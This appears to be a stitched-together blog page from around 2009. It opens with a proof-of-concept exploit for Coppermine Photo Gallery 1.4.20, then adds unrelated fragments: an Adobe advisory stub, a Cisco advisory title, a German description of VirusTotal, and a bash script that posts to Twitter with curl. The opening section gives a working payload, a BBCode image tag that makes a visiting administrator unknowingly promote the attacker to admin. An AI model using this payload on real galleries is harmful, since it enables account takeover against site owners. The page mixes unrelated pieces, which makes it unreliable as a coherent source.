Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation
+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it) |
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img]
+--------------------------------------------------------------------------+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+--------------------------------------------------------------------------+
Insert the below code into a new message
hey admin,nice web site 
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
+-------------------------------------------------------------------------+
APSA09-01 – Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat
Release date: February 19, 2009
Vulnerability identifier: APSA09-01
CVE number: CVE-2009-0658
Platform: All platforms
Summary:
APSA09-01 - Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat.
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine – Cisco Systems
FYI
www.VirusTotal.com/de/
Virustotal analysiert verdächtige Dateien und erleichtert die schnelle Erkennung von Viren, Würmern, Trojanern und jeglicher Art von Malware, welche von den Antivirus-Engines festgestellt werden.
Über VirusTotal
VirusTotal bietet einen Analysedienst für jegliche Typen von verdächtigen Dateien. Der Dienst ermöglicht eine schnelle Erkennung von Viren, Würmern, Trojanern und anderer Malware, welche von Anti-Virus Engines erkannt wird.
Merkmale:
- Unabhängiger und kostenloser Dienst
- Nutzen von mehreren Anti-Virus Engines
- Automatische Updates von Virensignaturen in Echtzeit
- Detailierte Ergebnisse von jeder Anti-Virus Engine
- Globale Statistiken in Echtzeit
Senden der Dateien per email
Erstellen Sie eine neue E-Mail mit der Empfängeradresse scan@virustotal.com
- Als Betreff der E-Mail tragen Sie bitte SCAN ein.
- Hängen Sie die verdächtige Datei an die erstellte E-Mail an. Als Größenlimit sind 20 MByte festgelegt. E-Mails, welche diese Größe überschreiten werden vom System verworfen.
- Nach Analyse erhalten Sie sofort einen Bericht zum Dateiscan. Die Antwortzeiten des Systems hängen zum Zeitpunkt ihrer Analyseanfrage von der momentanen Auslastung unserer Serversysteme ab.
Twitter.com via shell aktualisieren
Hier ein Script welches euch hilft Twitter via "bash" shell zu steuern.
Dieses Script überprüft auch, ob ihr nicht über 140 Zeichen eingegeben habt.
Das Script sollte selbsterklärend sein:
#!/bin/bash
# konfiguration
user=EUER-Twitter-Username
pass=Euer-Twitter-Passwort
# alias twitter_update ='pfad/zum/script/'
# nachricht einlesen
clear
echo "--------------------------------"
echo "Biite Twitter-Nachricht eingeben"
echo "--------------------------------"
read input
# nur 140 Zeichen
if [ $(echo $input|wc -m) -gt 140 ]; then
echo 'Zu lang!: '$(echo $input|wc -m)
echo 'Bleib unter 140 Zeichen'
exit 1
fi
curl --output "/tmp/twitter.tmp" --user $user:$pass --data status="$input" http://twitter.com/statuses/update.xml
#delete the tmpfile
rm /tmp/twitter.tmp
clear
echo "Twitter Account Update"
echo "Neuer Status" $input